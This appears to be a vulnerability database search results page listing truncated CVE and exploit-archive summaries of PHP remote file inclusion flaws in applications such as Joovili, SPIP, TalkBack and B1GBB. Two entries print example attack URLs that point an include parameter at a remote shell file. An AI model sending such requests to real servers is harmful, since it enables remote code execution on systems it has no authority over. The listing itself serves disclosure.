647 matches found
CVE-2008-0743
PHP remote file inclusion vulnerability in membershelp.php in Joovili 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the hlp parameter...
CVE-2008-0572
Multiple PHP remote file inclusion vulnerabilities in Mindmeld 1.2.0.10 allow remote attackers to execute arbitrary PHP code via a URL in the MMGLOBALShome parameter to (1) acweb/adminindex.php; and (2) ask.inc.php, (3) learn.inc.php, (4) manage.inc.php, (5) mind.inc.php, and (6) sensory.inc.php in include/...
CVE-2007-6347
PHP remote file inclusion vulnerability in blocks/blocksitemap.php in ViArt (1) CMS 3.3.2, (2) HelpDesk 3.3.2, (3) Shop Evaluation 3.3.2, and (4) Shop Free 3.3.2 allows remote attackers to execute arbitrary PHP code via a URL in the rootfolderpath parameter. NOTE: some of these details are obtained from...
CVE-2007-6105
Multiple PHP remote file inclusion vulnerabilities in TalkBack 2.2.7 allow remote attackers to execute arbitrary PHP code via a URL in the (1) languagefile parameter to (a) comments-display-tpl.php and (b) addons/separate-comments-mod/my-comments-display-tpl.php and the (2) configcommentsformtpl paramete...
Design/Logic Flaw
Incomplete blacklist vulnerability in index.php in Artmedic CMS 3.4 and earlier allows remote attackers to execute arbitrary PHP code via a (1) UNC share pathname, or a (2) ftps, (3) ssh2.sftp, or (4) ssh2.scp URL, in the page parameter, for which PHP remote file inclusion is blocked only for http, https...
CVE-2007-5363
PHP remote file inclusion vulnerability in admin.panoramic.php in the Panoramic Picture Viewer companoramic mambot plugin 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfiglivesite parameter. NOTE: the provenance of this information is unknown; the...
CVE-2007-5294
PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...
CVE-2007-5215
Multiple PHP remote file inclusion vulnerabilities in Jacob Hinkle GodSend 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the SCRIPTDIR parameter to (1) gtk/main.inc.php or (2) cmdline.inc.php. NOTE: vector 2 is disputed by CVE because it is contained in unaccessible code,...
CVE-2007-4738
Multiple PHP remote file inclusion vulnerabilities in SpeedTech PHP Library STPHPLibrary 0.8.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) dbconf or (2) ADODBDIR parameter to utils/stphpimageshow.php; or a URL in the STPHPLIBDIR parameter to (3) stphpbutton.php, (4)...
PHPOF 20040226 - DB_adodb.class.php Remote File Inclusion
PHPOF 20040226 - DB_adodb.class.php Remote File Inclusion Phpof Remote file inclusion Download script : http://www.phpof.org/phpof-20040226.tar.bz2 Thx Str0ke Exploit : http://victime.com/phpofpath/dbmodules/DB_adodb.class.php?PHPOFINCLUDEPATH=shell.txt? Discovered by ThE TiGeR...
CVE-2007-4525
PHP remote file inclusion vulnerability in inc-calcul.php3 in SPIP 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in the squelettecache parameter, a different vector than CVE-2006-1702. NOTE: this issue has been disputed by third party researchers, stating that the...
CVE-2007-4331
PHP remote file inclusion vulnerability in index.php in FindNix allows remote attackers to include the contents of arbitrary URLs and conduct cross-site scripting (XSS) attacks via a URL in the page parameter...
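B1GBB Footer.Inc.PHP Remote File Inclusion Vulnerability
B1GBB is a PHP-based web application. B1GBB does not properly filter user-supplied URI data, so remote attackers can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Footer.Inc.PHP' script does not filter the user-supplied 'tfooter' parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. b1gBB 2.24 No detailed solution is currently available: http://board.b1g.de/forumdisplay.php?f=13 http://www.example.com/path/footer.inc.php?tfooter=shell?...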
CVE-2007-3315
Multiple PHP remote file inclusion vulnerabilities in YourFreeScreamer 1.0, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the serverPath parameter to bodyTemplate.php in (1) templates/Classic/, (2) templates/Classic Guestbook/, (3)...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in PBSite allow remote attackers to execute arbitrary PHP code via a URL in the (1) dbpath parameter to (a) useronline.php, (b) ucp.php, (c) setcookie.php, (d) sendpm.php, (e) search.php, (f) register.php, (g) profile.php, (h) post.php, (i) pmpshow.php, (j) pm.php, (k)...
CVE-2007-2607
PHP remote file inclusion vulnerability in views/print/printbar.php in LaVague 0.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the viewspath parameter...
CVE-2007-2609
Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the (a) ETCDIR parameter to (1) libs/lom.php; (2) lomupdate.php, (3) check-lom.php, and (4) weighkeywords.php in scripts/; the (b) LIBSDIR parameter to (5) logout.php, (6) help.php...
CVE-2007-2422
Multiple PHP remote file inclusion vulnerabilities in Modules Builder (modbuild) 4.1 for Comdev One Admin allow remote attackers to execute arbitrary PHP code via a URL in the pathdocroot parameter to (1) config-bak.php or (2) config.php. NOTE: CVE disputes this vulnerability because the unmodified...
CVE-2007-2255
Multiple PHP remote file inclusion vulnerabilities in Download-Engine 1.4.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) engdir parameter to addmember.php, (2) langpath parameter to admin/enginelib/class.phpmailer.php, and the (3) spawroot parameter to...